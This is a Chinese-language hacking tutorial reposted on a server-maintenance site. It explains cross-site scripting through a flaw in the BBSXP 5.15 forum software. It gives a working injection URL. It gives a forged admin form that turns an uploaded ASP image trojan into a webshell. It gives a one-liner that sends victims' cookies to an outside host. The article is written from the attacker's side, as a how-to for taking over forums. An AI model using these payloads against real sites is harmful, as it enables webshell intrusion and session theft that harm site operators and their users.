- Rongsen.Com.Cn 版权所有 2008-2010 京ICP备08007000号 京公海网安备11010802026356号 朝阳网安编号:110105199号
- 北京黑客防线网安工作室-黑客防线网安服务器维护基地为您提供专业的
服务器维护
,企业网站维护
,网站维护
服务 - (建议采用1024×768分辨率,以达到最佳视觉效果) Powered by 黑客防线网安 ©2009-2010 www.rongsen.com.cn
作者:黑客防线网安SQL维护基地 来源:黑客防线网安SQL维护基地 浏览次数:0 |
所谓跨站漏洞呢?其实这和现在比较热门的SQL注入的原理有异曲同工之处,都是由于程序员在写程序的时候对一些变量没有做充分的过滤,或者没做任何的过滤就直接把用户提交的数据送到SQL语句里执行,这样导致了用户所提交的一些特意构造的语句 一般都是带有象JAVAScript等这类脚本代码,这样在服务里一旦被执行就形成了所谓的跨站攻击了。一般来说对于人机交互行比较高的程序,比如论坛,留言版这类程序都比较容易存在跨站script攻击。
如何判断一个程序是否存在跨站漏洞呢?分析程序是最直接的方法了,比如最近搞的很火的BBSXP5.15的跨站
漏洞,因为有大虾已经详细的介绍了,偶也就不在详述了,简单的说一下在cookies.asp文件里有这么一句
Response.Cookies("skins")=""&Request("no")&""然后在setup.asp里
response.write "<html><head><meta http-equiv=Content-Type content=text/html;charset=gb2312></head>
<link href=images/skins/"&Request.Cookies("skins")&"/bbs.css rel=stylesheet><script src=inc/BBSxp.js></script>
<script src=inc/ybb.js></script><script src=images/skins/"&Request.Cookies("skins")&"/bbs.js></script>"
我们可以看到,只要构造符合条件的skin的NO,然后在闭合前面的一个"<"接着就可以在后面加上我们的<script脚本了
比如: http://xxx.xxxx.xxx/cookies.asp?menu=skins&no=4><script>document.write(’<IFRAME marginWidth=100 marginHeight=100 src="http://www.baidu.com"frameBorder=100width=0scrolling=noheight=0to ... gin="0"></IFRAME>’);</script><script>
这样提交就可以达到我们的跨站目的了,(这个我动画里已经有演示了)
而跟深一层的利用,我们则可以构造表单,迷惑管理员点我们的帖子,或者联接。比如我们构造
http://127.0.0.1/bbsxp/page2.asp?username=<body onload="javascript:document.forms[0].submit()">
<form action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post">
<input value="/UploadFile/2005-5/200512365.jpg" name="yl" >
<input value="database/haha.asp" name="bf" >
</body></html>
/UploadFile/2005-5/200512365.jpg
这是你的ASP图片木马
这样我们就如果让管理员浏览了我们的留言,那么这个脚本就会自动把/UploadFile/2005-5/200512365.jpg
备份成database/haha.asp。我们也就有了可爱的webshell了。而为什么要管理员浏览才有效呢?因为服务器上是存在cookies和session机制的
而session其实是在服务器端的tmp目录下的某一个文件中为每个用户储存一些变量,对session的操作其实是对文件读写操作。
seesion是每个用户都有自己的session。他们的生命周期一般是用户打开某网站浏览器到关闭与次网站连接所
有的浏览器后结束。cookie这是在用户端的存贮机制,他需要用户的打开cookie支持,所以只有管理才有权利把我们JPG备份在ASP
现在大家用的比较常见的就是盗取cookies而后欺骗,或者利用社会工程学进一步入侵比如我们构造下面的脚本代码就可以盗取用户cookies了
javascript:window.open(‘http://xxx.xxx.xxx/cookies.asp?msg=’+document.cookie)
我要申请本站:N点 | 黑客防线官网 | |
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479 |